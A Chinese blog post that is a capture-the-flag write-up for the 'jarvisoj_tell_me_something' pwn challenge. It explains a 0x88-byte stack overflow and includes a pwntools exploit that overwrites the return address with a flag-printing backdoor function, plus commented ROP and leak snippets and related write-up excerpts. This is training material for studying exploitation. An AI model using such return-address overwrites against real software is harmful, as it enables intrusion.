jarvisoj_tell_me_something

于 2023-05-22 12:04:10 发布
阅读量68 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130804396
版权

小白垃圾做题笔记,不及建议阅读。

还好听了师傅的话,每次打之前确定下ida是否判断的正确。

这个的话,输入0x88个字符后,后边就是返回地址。

我在调试的时候并没有发现ebp,我用python生成了0x88个字符后,有手动输入了8个a

发现返回的时候变成了这个:

意思就是0x88个字符后就是返回地址了。

ida中发现有后门函数:

 查找字符串后ctrl+x找到函数所在地址。

 

 

addr=0x0000000000400620

好将返回地址覆盖成后门函数:

exp:

from pwn import *

debug=0
if debug:
    p=process('./guestbook')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    gdb.attach(p)
else:
    p=remote('node4.buuoj.cn',26299)

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)



good_game_addr=0x0000000000400620
ru(b'message:\n')
payload=b'a'*0x88+p64(good_game_addr)
se(payload)
p.interactive()

#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"
#write_add=u32(p.recv(4))

#addr=u32(r.recvuntil('\xf7')[-4:])
#puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
#sa(b'wish!\n', b'%11$p')
#rl(b'0x')
#canary = int(p.recv(16), 16)

打印flag:

 

y6y6y666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-jarvisoj_tell_me_something
Rt1Text的博客
11-07 108
read有栈溢出flag.txt进行栈溢出将返回地址覆盖为fopen函数地址。
[BUUCTF]PWN——jarvisoj_tell_me_something
mcmuyanga的博客
11-02 274
jarvisoj_tell_me_something 附件 步骤: 例行检查,64位程序,开启了NX保护 运行一下程序,看看程序的大概流程 64位ida载入,shift+f12检索程序里的字符串 看到了flag.txt关键子,双击跟进,找到了程序里的后门,flag_addr=0x400620 从main函数开始看程序 输入点的v4明显的溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag 这边有一个注意点 看汇编发现这个程序的结尾处跟平常函数的结尾不一样没有leave 这道题
BUUCTF pwn——jarvisoj_tell_me_something
CNS-Enterprise BCC-1701-J
04-17 148
BUUCTF 做题练习
pwm.rar_Let Me Tell You
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种常用的技术,用于通过改变信号的高电平时间(占空比)来控制功率或者模拟信号的输出。在C51编程环境中,PWM的生成是嵌入式系统开发中的重要一环,尤其是在驱动...
rest.rar_The Tell
09-23
在IT行业中,`rest.rar_The Tell`这个标题可能指的是一个特定的软件开发项目或代码库,其中包含了一些用于处理磁盘空间检测的功能。在这个场景下,`The Tell`可能是项目的一部分,它专注于检查磁盘的大小是否小于...
LINUX-ACPI.rar_The Tell_acpi
09-20
LINUX ACPI. this artical will tell you some problem occurd under system related to the ACPI function in BIOS
iic.rar_The Tell_msp430f149 IIc
09-23
《IIC通信协议在msp430f149微控制器中的应用详解》 IIC(Inter-Integrated Circuit)通信协议,又称I2C或I²C,是一种由飞利浦(现NXP Semiconductors)公司开发的、用于微控制器和其他设备之间进行低速串行通信的...
show_and_tell
04-01
标题“show_and_tell”可能指的是一个编程项目或者教程,其中包含了使用Kotlin语言进行“显示与讲述”的功能。在编程领域,"Show and Tell"通常用于指导开发者如何通过代码展示特定的功能或概念。Kotlin是一种现代、...
jarvisoj_tell_me_something【BUUCTF】
qq_41696518的博客
09-03 188
那就很简单了,溢出指向漏洞函数即可,但此题有个小坑,其实最开始学pwn时会通过gdb查找溢出大小,但后面懒了就直接通过IDA查看,但IDA并不一定准确,并且题目本身也会有坑,比如该题。但本题,main函数没有push ebp的操作,所有溢出时不需要多加8字节ebp位置。
jarvisoj——Tell Me Something
王嘟嘟的博客
07-14 540
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。 题目 Wp 这里首先下载,然后ida打开,看到main函数 main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。 然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。 那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。 最后就是先覆盖136的自身,然后加上good_game的地址即可。 pwntools fro
Jarvis OJ Tell Me Something
九层台
04-05 566
nc pwn.jarvisoj.com 9876 题目网址 https://www.jarvisoj.com/challenges 需要原料: python zio模块。 拿到程序名字太长了,改名成 1 用file命令查看文件类型 file 1 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically...
BUUCTF:jarvisoj_tell_me_something(write up)
qq_44768749的博客
08-24 443
BUUCTF:jarvisoj_tell_me_something0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 仅开启了栈不可执行保护 0x02 运行 只是输入一条message 0x03 IDA good_game函数将flag.txt内容输出 0x04 思路 是一道简单的栈溢出题,知道覆盖长度即可,gdb调试 发现输入message的地址到返回地址的长度为0x88字节 0x05 exp #!/usr/bin/python
[Jarvis OJ - PWN]——Tell Me Something
Y_peak的博客
02-02 284
[Jarvis OJ - PWN]——Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目:
Jarvis oj tell me something writeup
ditto的博客
12-31 257
拿到题目前checksec下: 64位,开启了NX。 放到IDA里看下: 就单纯的栈溢出,看下调用哪些函数: plt表里并没有system函数,也不知道对方使用的动态库的版本。 看到函数good_game: 这个函数会读取flag,那么就很显然了,将返回地址覆盖到这个函数即可。 计算下溢出点: 由于是64位的程序,不能访问大于0x00007fffffffffff的地址空间。 但是可以通...
Buuctf(pwn) jarvisoj_tell_me_something 栈溢出
半岛铁盒的博客
08-15 155
64位程序,开启了NX保护 400620 from pwn import * r=remote('node4.buuoj.cn',29273) flag_addr=0x400620 payload='a'*(0x88)+p64(flag_addr) r.sendline(payload) r.interactive() 这道题需要注意的一点是没有返回 这是其栈结构 所以这道题直接溢出0x88即可 ...
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 992
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
文件操作_tell的用法
最新发布
05-12
在Python中,文件对象提供了一个tell()方法,该方法返回文件指针当前的位置。文件指针表示从文件开头到当前位置的字节数。 下面是一个使用tell()方法的示例: ```python # 打开文件 file = open("example.txt", "r...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值